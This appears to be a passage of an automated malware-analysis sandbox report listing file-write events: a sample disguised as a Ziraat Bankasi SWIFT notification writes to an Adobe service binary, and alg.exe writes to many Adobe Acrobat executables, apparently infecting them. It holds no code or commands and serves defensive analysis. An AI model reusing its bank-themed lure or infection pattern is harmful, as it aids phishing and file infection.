Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
